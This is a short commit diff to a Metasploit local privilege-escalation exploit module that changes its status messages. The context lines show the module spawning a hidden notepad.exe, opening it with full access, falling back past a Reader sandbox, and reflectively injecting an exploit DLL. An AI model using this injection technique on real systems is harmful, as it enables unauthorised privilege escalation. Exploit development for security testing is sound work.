Fixing messages
parent
541bb6134e
commit
abb03d0bbe
|
@ -101,12 +101,13 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
||||||
begin
|
begin
|
||||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||||
|
print_good("Process #{process.pid} launched.")
|
||||||
rescue Rex::Post::Meterpreter::RequestError
|
rescue Rex::Post::Meterpreter::RequestError
|
||||||
# Reader Sandbox won't allow to create a new process:
|
# Reader Sandbox won't allow to create a new process:
|
||||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||||
|
print_status("Operation failed. Trying to elevate the current process...")
|
||||||
process = client.sys.process.open
|
process = client.sys.process.open
|
||||||
end
|
end
|
||||||
print_good("Process #{process.pid} launched.")
|
|
||||||
|
|
||||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||||
|
|
Loading…
Reference in New Issue